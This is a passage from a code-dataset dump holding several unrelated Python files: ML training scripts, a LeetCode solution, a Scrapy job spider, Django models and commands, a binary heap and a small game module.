main()","sub_path":"venv/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"553873407","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_absolute_percentage_error, mean_absolute_error, mean_squared_error\n\n\ndef main():\n print('Train and test PBSM-Multiplier tuning model')\n\n training_df = pd.read_csv('training_data_larger_medium_datasets.csv', header=0, sep=',')\n\n features = ['size_x', 'num_features_x', 'num_points_x', 'avg_area_x', 'avg_sidelength_1_x', 'avg_sidelength_2_x', 'e0_x' , 'e2_x',\n 'size_y', 'num_features_y', 'num_points_y', 'avg_area_y', 'avg_sidelength_1_y', 'avg_sidelength_2_y', 'e0_y', 'e2_y']\n label = ['pbsm_multiplier_best']\n\n train_data, test_data = train_test_split(training_df, test_size=0.20, random_state=41)\n\n X_train = pd.DataFrame.to_numpy(train_data[features])\n y_train = pd.DataFrame.to_numpy(train_data[label])\n X_test = pd.DataFrame.to_numpy(test_data[features])\n y_test = pd.DataFrame.to_numpy(test_data[label])\n\n reg_model = RandomForestRegressor(max_depth=8, random_state=11)\n model = reg_model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n\n y_test = y_test.flatten()\n print(y_test.shape)\n print(y_pred.shape)\n # print(np.array(y_test.flatten()))\n\n # test_df = pd.DataFrame()\n # test_df['y_test'] = 'a'\n # test_df['y_pred'] = y_pred\n # test_df.to_csv('test_df.csv')\n\n output_f = open('test.csv', 'w')\n output_f.writelines('y_test,y_pred\\n')\n for a, b in zip(y_test, y_pred):\n output_f.writelines('{},{}\\n'.format(a, b))\n output_f.close()\n\n mae = mean_absolute_error(y_test, y_pred)\n mape = mean_absolute_percentage_error(y_test, y_pred)\n mse = mean_squared_error(y_test, y_pred)\n print('{},{},{}'.format(mae, mape, mse))\n\n # Baseline\n y_pred_100 = [100] * len(y_pred)\n mae = mean_absolute_error(y_test, y_pred_100)\n mape = mean_absolute_percentage_error(y_test, y_pred_100)\n mse = mean_squared_error(y_test, y_pred_100)\n\n print('{},{},{}'.format(mae, mape, mse))\n\n training_df = pd.read_csv('training_data_larger_medium_datasets.csv', header=0, sep=',')\n y_100 = training_df['mbr_tests_100']\n y_best = training_df['mbr_tests_best']\n\n output_f = open('test_100.csv', 'w')\n output_f.writelines('mbr_tests_best,mbr_tests_100\\n')\n for a, b in zip(y_best, y_100):\n output_f.writelines('{},{}\\n'.format(a, b))\n output_f.close()\n\n mae = mean_absolute_error(y_best, y_100)\n mape = mean_absolute_percentage_error(y_best, y_100)\n mse = mean_squared_error(y_best, y_100)\n\n print('{},{},{}'.format(mae, mape, mse))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tuning/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"222747607","text":"# LC 396. Rotate Function\n\n'''\nYou are given an integer array nums of length n.\n\nAssume arrk to be an array obtained by rotating nums by k positions clock-wise. We define the rotation function F on nums as follow:\n\nF(k) = 0 * arrk[0] + 1 * arrk[1] + ... + (n - 1) * arrk[n - 1].\nReturn the maximum value of F(0), F(1), ..., F(n-1).\n\nThe test cases are generated so that the answer fits in a 32-bit integer.\n\nExample 1:\n\nInput: nums = [4,3,2,6]\nOutput: 26\nExplanation:\nF(0) = (0 * 4) + (1 * 3) + (2 * 2) + (3 * 6) = 0 + 3 + 4 + 18 = 25\nF(1) = (0 * 6) + (1 * 4) + (2 * 3) + (3 * 2) = 0 + 4 + 6 + 6 = 16\nF(2) = (0 * 2) + (1 * 6) + (2 * 4) + (3 * 3) = 0 + 6 + 8 + 9 = 23\nF(3) = (0 * 3) + (1 * 2) + (2 * 6) + (3 * 4) = 0 + 2 + 12 + 12 = 26\nSo the maximum value of F(0), F(1), F(2), F(3) is F(3) = 26.\n\nExample 2:\n\nInput: nums = [100]\nOutput: 0\n'''\nclass Solution:\n def maxRotateFunction(self, nums: List[int]) -> int:\n\n nsum = sum(nums)\n f0 = 0\n\n for i, n in enumerate(nums):\n f0 += i * n\n\n prev = f0\n res = f0\n\n for i in range(1, len(nums)):\n fi = prev + nsum - nums[len(nums) - i] * len(nums)\n res = max(res, fi)\n prev = fi\n\n return res\n","sub_path":"1. Problems/m. Math/d. Other - Math - Rotate Function.py","file_name":"d. Other - Math - Rotate Function.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"102359778","text":"n, li = int(input('Digite um número positivo: ')), []\n\nfor d in range(n, 0, -1):\n\n p = True\n\n for c in range(d-1, 1, -1):\n if d % c == 0:\n p = False\n else:\n if p:\n li.append(d)\nelse:\n li.sort()\n\nprint(f'Números primos entre 1 e {n}: ')\nprint(li)\n\n\n","sub_path":"EstruturaDeRepeticao/ex35.py","file_name":"ex35.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"605596073","text":"# A wrapper script that trains the SELDnet. The training stops when the SELD error (check paper) stops improving.\n# This is only for the training of SED, and DOA with regression strategy.\n\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport cls_feature_class\nimport cls_data_generator\nfrom metrics import evaluation_metrics\nimport parameter\nfrom tqdm import tqdm\nimport argparse\n\nimport torch\nimport torch.optim as optim\nfrom pytorch_model import CUDA, kaiming_init, mse_loss, bce_loss, weighted_mse_loss\nfrom pytorch_model import CRNN_SED, MTFA_SED, MCRNN_SED\nfrom torch.autograd import Variable\n\nplot.switch_backend('agg')\n\n\ndef collect_test_labels_3000(_data_gen_test):\n # Collecting ground truth for test data\n nb_batch = _data_gen_test.get_total_batches_in_data()\n batch_size = 1\n gt_sed = np.zeros((nb_batch * batch_size, 3000, 11))\n cnt = 0\n for _, tmp_label in _data_gen_test.generate():\n gt_sed[cnt * batch_size:(cnt + 1) * batch_size, :, :] = tmp_label[0]\n cnt = cnt + 1\n if cnt == nb_batch:\n break\n return gt_sed.astype(int)\n\n\ndef collect_test_labels(_data_gen_test, _data_out):\n # Collecting ground truth for test data\n nb_batch = _data_gen_test.get_total_batches_in_data()\n\n batch_size = _data_out[0][0]\n gt_sed = np.zeros((nb_batch * batch_size, _data_out[0][1], _data_out[0][2]))\n gt_doa = np.zeros((nb_batch * batch_size, _data_out[0][1], _data_out[1][2]))\n\n print('nb_batch in test: {}'.format(nb_batch))\n cnt = 0\n for _, tmp_label in _data_gen_test.generate():\n gt_sed[cnt * batch_size:(cnt + 1) * batch_size, :, :] = tmp_label[0]\n gt_doa[cnt * batch_size:(cnt + 1) * batch_size, :, :] = tmp_label[1]\n cnt = cnt + 1\n if cnt == nb_batch:\n break\n return gt_sed.astype(int), gt_doa\n\n\ndef save_model(model, model_name='model'):\n states = {'model_states': model.state_dict()}\n with open(model_name, 'wb+') as f:\n torch.save(states, f)\n\n\ndef load_model(model, model_name='model'):\n if os.path.isfile(model_name):\n with open(model_name, 'rb') as f:\n checkpoint = torch.load(f)\n model.load_state_dict(checkpoint['model_states'])\n else:\n raise ValueError('The specified model file does not exists!')\n return model\n \n\ndef main(args):\n '''\n Main wrapper for training sound event localization and detection network.\n \n :param argv: expects two optional inputs. \n first input: task_id - (optional) To chose the system configuration in parameters.py. (default) 1 - uses default parameters\n second input: job_id - (optional) all the output files will be uniquely represented with this. (default) 1\n '''\n # use parameter set defined by user\n dataset, mode, task_id, job_id = args.dataset, args.mode, args.name, args.job_id\n task = 'sed'; feat_type = 'mel'; nb_ch = 4; doa_type = None\n params, model_params = parameter.get_params(dataset=dataset, mode=mode, task_id=task_id, feat_type=feat_type, doa=doa_type)\n\n train_splits, val_splits, test_splits = None, None, None\n if params['mode'] == 'dev':\n test_splits = [1, 2, 3, 4]\n val_splits = [2, 3, 4, 1]\n train_splits = [[3, 4], [4, 1], [1, 2], [2, 3]]\n\n avg_scores_val = []\n avg_scores_test = []\n for split_cnt, split in enumerate(test_splits):\n print('\\nThis is split {}'.format(split_cnt))\n\n # Unique name for the run\n model_dir_prefix = os.path.join(params['model_dir'], task) if task == 'sed' else os.path.join(params['model_dir'], 'doa_reg')\n cls_feature_class.create_folder(model_dir_prefix)\n #model_id = int(job_id) + split_cnt\n unique_name = '{}{}_{}_{}_sed_dev_split{}'.format(task_id, str(job_id), params['dataset'], params['feat_type'], split_cnt+1)\n unique_name = os.path.join(model_dir_prefix, unique_name)\n model_name = '{}_model.h5'.format(unique_name)\n print('\\tmodel unique name: {}\\n'.format(unique_name))\n\n # Load train and validation data\n print('Loading training dataset:')\n data_gen_train = cls_data_generator.DataGenerator(\n dataset=params['dataset'], \n split=train_splits[split_cnt], \n batch_size=params['batch_size'],\n seq_len=params['seq_length'], \n feat_label_dir=params['feat_label_dir'],\n feat_type=feat_type,\n doa=doa_type\n )\n\n print('Loading validation dataset:')\n data_gen_val = cls_data_generator.DataGenerator(\n dataset=params['dataset'], \n split=val_splits[split_cnt], \n batch_size=params['batch_size'],\n seq_len=3000,\n per_file=True,\n feat_label_dir=params['feat_label_dir'],\n shuffle=False,\n feat_type=feat_type,\n doa=doa_type\n )\n\n # Collect the reference labels for validation data\n data_in, data_out = data_gen_train.get_data_sizes()\n print('FEATURES:\\n\\tdata_in: {}\\n\\tdata_out: {}\\n'.format(data_in, data_out))\n\n gt = collect_test_labels_3000(data_gen_val)\n sed_gt = evaluation_metrics.reshape_3Dto2D(gt) # [3000*100, 11]\n nb_classes = data_gen_train.get_nb_classes()\n def_elevation = data_gen_train.get_default_elevation()\n if task_id == 'crnn':\n model = CUDA(CRNN_SED(data_in, data_out[0]))\n elif task_id == 'mcrnn':\n model = CUDA(MCRNN_SED(data_in, data_out[0]))\n model.apply(kaiming_init)\n \n total_num = sum(param.numel() for param in model.parameters())\n print('==========================================')\n print('Total parameter number for {}: {}'.format(model_params['method'], total_num))\n print('==========================================')\n \n # Pytorch optimizer\n optimizer = optim.Adam(params=model.parameters(), lr=0.001)\n feat_torch = CUDA(Variable(torch.FloatTensor(params['batch_size'], nb_ch, params['seq_length'], params['feat_dim'])))\n label_sed = CUDA(Variable(torch.FloatTensor(params['batch_size'], params['seq_length'], 11)))\n best_seld_metric = 99999\n best_sed_metric = 99999\n best_epoch = -1\n patience_cnt = 0\n seld_metric = np.zeros(params['nb_epochs'])\n tr_loss = np.zeros(params['nb_epochs'])\n sed_val_loss = np.zeros(params['nb_epochs'])\n sed_metric = np.zeros((params['nb_epochs'], 2))\n nb_epoch = params['nb_epochs']\n \n # start training\n pbar_epoch = tqdm(total=nb_epoch, desc='[Epoch]')\n for epoch_cnt in range(nb_epoch):\n # train stage\n model.train()\n iter_cnt = 0\n for feat, label in data_gen_train.generate():\n feat_torch.resize_(params['batch_size'], nb_ch, params['seq_length'], params['feat_dim'])\n feat_torch.data.copy_(torch.from_numpy(feat))\n\n label_sed.resize_(params['batch_size'], params['seq_length'], 11)\n label_sed.data.copy_(torch.from_numpy(label[0]))\n sed = model(feat_torch)\n\n sed_loss = bce_loss(sed, label_sed)\n doa_loss = 0.0\n \n total_loss = sed_loss + doa_loss\n\n optimizer.zero_grad()\n total_loss.backward()\n optimizer.step()\n\n if iter_cnt % params['print_iter'] == 0:\n pbar_epoch.write('Iteration: {:3d}, sed_loss: {:.4f}, doa_loss: {:.4f}, total_loss: {:.4f}'.format(iter_cnt, sed_loss, doa_loss, total_loss))\n\n #pbar_iteration.update(1)\n iter_cnt += 1\n if iter_cnt >= data_gen_train.get_total_batches_in_data():\n break\n iter_cnt = 0\n sed_validation_loss = 0\n entire_pred_sed = np.zeros((data_gen_val._batch_size*data_gen_val.get_total_batches_in_data(), 3000, 11)) \n model.eval()\n with torch.no_grad():\n for feat, label in data_gen_val.generate():\n batch_size = feat.shape[0]\n \n feat_torch.resize_(batch_size, nb_ch, 3000, params['feat_dim'])\n feat_torch.data.copy_(torch.from_numpy(feat))\n label_sed.resize_(batch_size, 3000, 11)\n label_sed.copy_(torch.from_numpy(label[0]))\n\n sed = model(feat_torch)\n sed_loss = bce_loss(sed, label_sed)\n sed_validation_loss += sed_loss\n\n # concat all predictions\n entire_pred_sed[iter_cnt*batch_size:(iter_cnt+1)*batch_size, :] = sed.detach().cpu().numpy()\n iter_cnt += 1\n if iter_cnt >= data_gen_val.get_total_batches_in_data():\n break\n sed_validation_loss = sed_validation_loss/data_gen_val.get_total_batches_in_data()\n\n tr_loss[epoch_cnt] = total_loss\n sed_val_loss[epoch_cnt] = sed_validation_loss\n\n # Calculate the metrics\n sed_pred = evaluation_metrics.reshape_3Dto2D(entire_pred_sed) > params['threshold'] # compared with threshold \n sed_metric[epoch_cnt, :] = evaluation_metrics.compute_sed_scores(sed_pred, sed_gt, data_gen_val.nb_frames_1s())\n \n patience_cnt += 1\n if sed_metric[epoch_cnt, 0] < best_sed_metric:\n best_sed_metric = sed_metric[epoch_cnt, 0]\n best_epoch = epoch_cnt\n save_model(model, model_name)\n patience_cnt = 0\n\n pbar_epoch.update(1)\n \n pbar_epoch.write(\n 'epoch_cnt: %d, sed_tr_loss: %.4f, sed_val_loss: %.4f, ER_overall: %.2f, F1_overall: %.2f, best_sed_ER: %.4f, best_epoch : %d\\n' %\n (\n epoch_cnt, tr_loss[epoch_cnt], sed_val_loss[epoch_cnt],\n sed_metric[epoch_cnt, 0], sed_metric[epoch_cnt, 1],\n best_sed_metric, best_epoch\n )\n )\n\n if patience_cnt >= params['patience']:\n break\n\n pbar_epoch.close()\n\n avg_scores_val.append([sed_metric[best_epoch, 0], sed_metric[best_epoch, 1]])#, doa_metric[best_epoch, 0], doa_metric[best_epoch, 1], best_seld_metric])\n print('\\nResults on validation split:')\n print('\\tUnique_name: {} '.format(unique_name))\n print('\\tSaved model for the best_epoch: {}'.format(best_epoch))\n print('\\tSED Metrics: ER_overall: {}, F1_overall: {}\\n'.format(sed_metric[best_epoch, 0], sed_metric[best_epoch, 1]))\n \n \n # ------------------ Calculate metric scores for unseen test split ---------------------------------\n print('Loading testing dataset:')\n data_gen_test = cls_data_generator.DataGenerator(\n dataset=params['dataset'], split=split, batch_size=params['batch_size'], seq_len=3000,\n feat_label_dir=params['feat_label_dir'], shuffle=False, per_file=True,\n is_eval=True if params['mode'] is 'eval' else False, #False\n feat_type=feat_type, \n doa=doa_type\n )\n test_batch_size = data_gen_test._batch_size\n\n print('\\nLoading the best model and predicting results on the testing split')\n model = load_model(model, '{}_model.h5'.format(unique_name))\n model.eval()\n \n # test stage\n total_test_batches = data_gen_test.get_total_batches_in_data()\n pbar_test = tqdm(total=total_test_batches, desc='[Testing]')\n iter_cnt = 0\n entire_test_sed = np.zeros((100, 3000, 11))\n with torch.no_grad():\n if params['mode'] == 'dev':\n for feat, label in data_gen_test.generate():\n batch_size = feat.shape[0]\n\n feat_torch.data.resize_(batch_size, nb_ch, 3000, params['feat_dim'])\n feat_torch.data.copy_(torch.from_numpy(feat))\n \n sed = model(feat_torch)\n # concat all predictions\n entire_test_sed[iter_cnt*test_batch_size:(iter_cnt+1)*test_batch_size, :] = sed.detach().cpu().numpy()\n pbar_test.update(1)\n iter_cnt += 1\n if iter_cnt >= data_gen_test.get_total_batches_in_data():\n break\n print('the test batch_size is{}'.format(batch_size))\n pbar_test.close()\n\n test_sed_pred = evaluation_metrics.reshape_3Dto2D(entire_test_sed) > params['threshold']\n if params['mode'] == 'dev':\n _, test_data_out = data_gen_test.get_data_sizes()\n test_gt= collect_test_labels_3000(data_gen_test)\n test_sed_gt = evaluation_metrics.reshape_3Dto2D(test_gt)\n test_sed_loss = evaluation_metrics.compute_sed_scores(test_sed_pred, test_sed_gt, data_gen_test.nb_frames_1s())\n avg_scores_test.append([test_sed_loss[0], test_sed_loss[1]])\n print('Results on test split:')\n print('\\tSED Metrics: ER_overall: {}, F1_overall: {}\\n'.format(test_sed_loss[0], test_sed_loss[1]))\n \n print('\\n\\nValidation split scores per fold:\\n')\n for cnt in range(len(val_splits)):\n print('\\t Split {} - SED ER: {} F1: {}'.format(\n val_splits[cnt], avg_scores_val[cnt][0], avg_scores_val[cnt][1]))\n \n if params['mode'] == 'dev':\n print('\\n\\nTesting split scores per fold:\\n')\n for cnt in range(len(val_splits)):\n print('\\t Split {} - SED ER: {} F1: {}'.format(\n test_splits[cnt], avg_scores_test[cnt][0], avg_scores_test[cnt][1]))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='SELD')\n parser.add_argument('-gpu', default=7, type=int, help='choose gpu number')\n parser.add_argument('-m', '--mode', default='dev', type=str, choices=['dev', 'eval'], help='choose mode')\n parser.add_argument('-d', '--dataset', default='foa', type=str, choices=['foa', 'mic'], help='choose dataset')\n parser.add_argument('-n', '--name', default='crnn', type=str, help='unique name for each method')\n parser.add_argument('-id', '--job_id', default='1', type=str, help='unique output name for a specific method (different parameters)')\n args = parser.parse_args()\n os.environ['CUDA_VISIBLE_DEVICES'] = str(args.gpu)\n\n try:\n sys.exit(main(args))\n except (ValueError, IOError) as e:\n sys.exit(e)\n","sub_path":"seld_sed_dev.py","file_name":"seld_sed_dev.py","file_ext":"py","file_size_in_byte":14600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"127304594","text":"'''\nCreated on Aug 5, 2013\n\n@author: sean\n'''\nfrom __future__ import print_function\nimport unittest\nfrom os.path import dirname,join\nfrom argparse import ArgumentParser\nfrom binstar_client.tests.runner import ColorTextTestRunner\nfrom binstar_client.tests.coverage_report import report\n\ndef main():\n \n parser = ArgumentParser()\n parser.add_argument('--html', action='store_true')\n parser.add_argument('source_dir', nargs='?', default='')\n args = parser.parse_args()\n \n import coverage\n cov = coverage.coverage(include='**%s**' % args.source_dir if args.source_dir else '**/binstar_client/**',\n omit=['**/lib/python2.7/**', '**/site-packages/**', '**/tests/**',\n ])\n \n cov.start()\n import binstar_client\n print(binstar_client)\n loader = unittest.loader.TestLoader()\n discover_dir = join(dirname(binstar_client.__path__[0]), args.source_dir)\n print('Discover %s' % discover_dir)\n tests = loader.discover(discover_dir)\n runner = ColorTextTestRunner(verbosity=2)\n result = runner.run(tests) \n cov.stop()\n cov.save()\n total = report(cov)\n if args.html:\n cov.html_report(directory='htmlcov')\n \n runner.write_end(result, total)\n \n exit(0 if result.wasSuccessful() else -1)\n \n \nif __name__ == '__main__':\n main()\n","sub_path":"lib/python2.7/site-packages/binstar_client/tests/runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"625526634","text":"\"\"\"This file is a JobAggregator spider created on top of the PaginationList Template.\n\n scrapy crawl jobaggregator -a mining_job_id=9999 -a iteration=1 -a url=\"http://careers.dupont.com/jobsearch/\"\n\nsample urls:\n \"http://careers.bonton.com/jobsearch/\"\n \"http://careers.dupont.com/jobsearch/\"\n \"http://careers.hmhco.com/jobsearch/\"\n\"\"\"\nfrom urlparse import urljoin, urlsplit\n\nfrom scrapy.loader import ItemLoader\nfrom scrapy.loader.processors import TakeFirst, Join\n\nfrom brightcorp.base.atsspider2.templates import PaginationList\nfrom brightcorp.processors import Prefix\n\n\nclass JobAggregator(PaginationList):\n\n name = 'jobaggregator'\n url_fragmentanchor = '?region=All'\n\n def get_job_url(self, sel, response, *args, **kwargs):\n url = ItemLoader(selector=sel).get_xpath(\n 'a[@class=\"jobslink\"]/@href', TakeFirst())\n return urljoin(response.url, url)\n\n def get_referencenumber(self, sel, response):\n referencenumber = ItemLoader(selector=sel).get_xpath(\n ['//div[@class=\"right-more\"]/div[span/div/text()=\"Requisition #: \"]/span/div/b/text()',\n '//dd[preceding-sibling::dt/text()=\"Req Id\"][1]/p/text()',\n '//dd[preceding-sibling::dt/text()=\"Requisition ID\"][1]/p/text()'],\n TakeFirst())\n return \"%s-%s\" % (\n urlsplit(response.url).netloc.split(\".\")[1], referencenumber)\n\n def get_page_url(self, sel, response, *args, **kwargs):\n return urljoin(\n response.url,\n 'ajax-call.php?region=All&page=%s' % kwargs['page'])\n\n def get_items_per_page(self, sel, response, *args, **kwargs):\n if 'dupont' in response.url:\n return 10\n else:\n return len(sel.xpath('//ul/li[a/div]'))\n\n parse_job_index_rules = {\n 'base': '//ul/li[a/div]',\n 'joburl': {'function': get_job_url},\n 'pagination': {\n 'itemsperpage': {'function': get_items_per_page},\n 'totalitems': {\n 'xpath': {\n 'xpaths': '//div[@id=\"results\"]/div[@class=\"mainresult\"]/\\\n div[@id=\"res\"]/text()',\n 'processors': TakeFirst()\n }\n },\n 'url': {'function': get_page_url}\n }\n }\n\n parse_job_rules = {\n 'title': {\n 'xpath': {\n 'xpaths': [\n '//span[@class=\"titleMore\"]/text()',\n '//div[@class=\"topBar-title\"]/text()'\n ]\n }\n },\n 'description': {\n 'xpath': {\n 'xpaths': [\n '//div[@class=\"left-text-more\"]/*[preceding-sibling::b/text()=\"Description\" and following-sibling::a]',\n '//div[@class=\"job-desc\"]'\n ],\n 'processors': Join('\\n')\n }\n },\n 'location': {\n 'xpath': {\n 'xpaths': [\n '//div[@class=\"right-more\"]/div[span/div/text()=\"Primary Locations: \"]/span/div/b/text()',\n '//span[@id=\"topBar_Location\"]/text()'\n ]\n }\n },\n 'jobcategory': {\n 'xpath': {\n 'xpaths': [\n '//div[@class=\"right-more\"]/div[span/div/text()=\"Job Category: \"]/span/div/b/text()',\n '//dd[preceding-sibling::dt/text()=\"Job Category\"][1]/p/text()'\n ]\n }\n },\n 'org_name': {\n 'xpath': {\n 'xpaths': '//div[@class=\"right-more\"]/div[span/div/text()=\"Organization: \"]/span/div/b/text()'\n }\n },\n 'jobtype': {\n 'xpath': {\n 'xpaths': [\"//dd[preceding-sibling::dt/text()='Job Type'][1]/p/text()\",\n \"//div[contains(text(), 'Employee Status')]/following-sibling::div/b/text()\"]\n }\n },\n 'referencenumber': {'function': get_referencenumber},\n\n 'company': {\n 'xpath': {\n 'xpaths': \"//dt[.='Name Plate']/following-sibling::dd[1]/p/text()\"\n }\n },\n\n 'educationrequirements': {\n 'xpath': {\n 'xpaths': \"//div[contains(text(), 'Education Level')]/following-sibling::div/b/text()\"\n }\n }\n }\n","sub_path":"brightcorp/brightcorp/spiders/jobaggregator.py","file_name":"jobaggregator.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"648795623","text":"inputFile = open(\"B-large.in\")\r\noutputFile = open(\"B-large.out\", \"w\")\r\n\r\n\r\n\r\ndef getDeepestBlank(sequence):\r\n sequence = sequence[::-1]\r\n for index, char in enumerate(sequence):\r\n if char == \"-\":\r\n return len(sequence) - index\r\n\r\ndef getDeepestContinuousSmile(sequence):\r\n for index, char in enumerate(sequence):\r\n if char == \"-\":\r\n return index\r\n\r\ndef performFlip(sequence, index):\r\n first = list(sequence[0:index])\r\n second = sequence[index:]\r\n\r\n first = first[::-1]\r\n\r\n for index, char in enumerate(first):\r\n if char == \"-\":\r\n first[index] = \"+\"\r\n else:\r\n first[index] = \"-\"\r\n\r\n return \"\".join(first) + second\r\n\r\ntestcases = int(inputFile.readline())\r\n\r\nfor testCase in range(testcases):\r\n seq = inputFile.readline()\r\n\r\n allSmiles = True\r\n\r\n for char in seq:\r\n if char == \"-\":\r\n allSmiles = False\r\n break\r\n\r\n if allSmiles:\r\n print(\"Took\", 0, \"flips\")\r\n outputFile.write(\"Case #\" + str(testCase+1) + \": 0\\n\")\r\n\r\n else:\r\n for i in range(10000):\r\n if seq[0] == \"+\":\r\n seq = performFlip(seq, getDeepestContinuousSmile(seq))\r\n else:\r\n seq = performFlip(seq, getDeepestBlank(seq))\r\n\r\n allSmiles = True\r\n\r\n for char in seq:\r\n if char == \"-\":\r\n allSmiles = False\r\n break\r\n\r\n if allSmiles:\r\n print(\"Took\", i + 1, \"flips\")\r\n outputFile.write(\"Case #\" + str(testCase+1) + \": \" + str(i+1) + \"\\n\")\r\n break\r\n\r\ninputFile.close()\r\noutputFile.close()\r\n","sub_path":"codes/CodeJamCrawler/16_0_2_neat/16_0_2_Grummy_Pancakes.py","file_name":"16_0_2_Grummy_Pancakes.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"388678679","text":"from __future__ import absolute_import\n\n# Standard Library\nfrom datetime import (\n datetime,\n timedelta,\n)\n\n# External Libraries\nfrom django.core.management import BaseCommand\n\n# Project Library\nfrom lindy.ticket.models.ticketaddon import TicketAddOn\n\n\nclass Command(BaseCommand):\n help = 'mark addons abandoned if not paid within 15 min'\n\n def handle(self, *args, **kwargs):\n to_expire = [\n addon for addon in TicketAddOn.objects.all().prefetch_related('ticket__ticketaddon_set')\n if addon.ticket.raw_price\n and not addon.is_paid\n and not addon.is_pending\n and not addon.is_paid_override\n ]\n\n for addon in to_expire:\n if addon.created_at < datetime.now(tz=addon.created_at.tzinfo) - timedelta(minutes=15):\n self.stderr.write('Deleting addon id {}'.format(addon.id))\n addon.delete()\n","sub_path":"lindy/ticket/management/commands/addon_expiry.py","file_name":"addon_expiry.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"303173369","text":"from django.db import models\nfrom django.contrib.gis.db import models as gismodels\nfrom django.contrib.auth import get_user_model\nfrom .abstract_base_classes import (\n CreationDatedModel, DescribedModel, NamedModel, PointOfInterest, UpdateDatedModel, Image\n)\n\n\nclass Profile(CreationDatedModel, DescribedModel, NamedModel, PointOfInterest, UpdateDatedModel):\n user = models.OneToOneField(get_user_model(), related_name='profile')\n photo = models.OneToOneField('Photo', related_name='+', null=True, default=None)\n # photo_albums: see PhotoAlbum.owner\n\n\nclass PhotoAlbum(CreationDatedModel, DescribedModel, NamedModel, UpdateDatedModel):\n owner = models.OneToOneField(Profile, related_name='photo_albums')\n # photos: see Photo.album\n\n\nclass Photo(CreationDatedModel, DescribedModel, Image, NamedModel):\n location = gismodels.PointField(blank=True, null=True, srid=4326)\n album = models.ForeignKey('PhotoAlbum', related_name='photos')\n","sub_path":"app/source/geo_django_rf/restapi/models/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"323061","text":"import math\n\n# Max Binary Heap\n#\tchilds: 2n+1 && 2n+2\n#\tparent: floor[(n-1)/2]\n#\twith 'n' is the index of chosen element\n\nclass MaxBinaryHeap:\n def __init__(self):\n self.values = []\n\n def __len__(self):\n return len(self.values)\n\n def __str__(self):\n return str(self.values)\n\n # ========== INSERTING ==========\n # Re-indexing max heap if it is violated (from bottom up)\n def bubble_up(self, index):\n current = self.values[index]\n parent_idx = math.floor((index-1)/2)\n while parent_idx >= 0:\n parent = self.values[parent_idx]\n if parent < current:\n # Swap\n self.values[index] = parent\n self.values[parent_idx] = current\n index = parent_idx\n parent_idx = math.floor((index-1)/2)\n else: return\n\n # Push new element into the Heap\n def insert(self, val):\n self.values.append(val)\n self.bubble_up(len(self.values)-1)\n\n # ========== REMOVING ==========\n # Re-indexing max heap if it is violated (from top down)\n def sink_down(self):\n length = len(self.values)\n element = self.values[0]\n index = 0 # Keep track of element's index'\n\n while True:\n left_child_idx = 2 * index + 1\n right_child_idx = 2 * index + 2\n \n if left_child_idx < length:\n left_child = self.values[left_child_idx] \n if right_child_idx < length:\n right_child = self.values[right_child_idx] \n # Swap larger child with element\n larger = left_child_idx if left_child > right_child else right_child_idx\n if self.values[larger] > element:\n # Swap\n self.values[index] = self.values[larger]\n self.values[larger] = element\n index = larger\n else: break\n elif left_child > element:\n self.values[index] = left_child\n self.values[left_child_idx] = element\n break\n else: break\n else: break\n return\n\n # Remove max element (highest priority) and return that element\n def extract_max(self):\n if len(self.values) == 0: return\n if len(self.values) == 1: return self.values.pop()\n highest = self.values[0]\n self.values[0] = self.values.pop()\n self.sink_down()\n return highest\n\n# Max Heap\n# 9\n# 7 8\n# 3 4 5 6\n\nheap = MaxBinaryHeap()\nheap.insert(9)\nheap.insert(7)\nheap.insert(8)\nheap.insert(3)\nheap.insert(4)\nheap.insert(5)\nheap.insert(6)\nprint(heap) # [9,7,8,3,4,5,6]\nheap.insert(10) \nprint(heap) # [10,9,8,7,4,5,6,3]\n\n# 10\n# 9 8\n# 7 4 5 6\n# 3\n\nheap.extract_max() \nprint(heap) # [9,7,8,3,4,5,6])\n","sub_path":"python/ds/binarytree/binaryheap.py","file_name":"binaryheap.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"572352240","text":"from random import shuffle\nfrom random import randint\nimport logger_decorator\nimport logger\n\nclass DungeonGameMap:\n\n game_entities = {'cell': '-', 'trap': '#', 'treasure':'X', 'player':'I', 'path':'+'}\n treasure_inverse_rate = 20\n trap_inverse_rate = 10\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def generate_characters(self, map_square):\n \"\"\"\n generates list of characters except player in random order\n :param: square of map\n :paramtype: int\n :return: list of characters\n :rtype:list(string)\n \"\"\"\n treasures_count = map_square // self.treasure_inverse_rate\n trap_count = map_square // self.trap_inverse_rate\n\n empty_cells_count = map_square - (trap_count + treasures_count)\n\n map_filling = 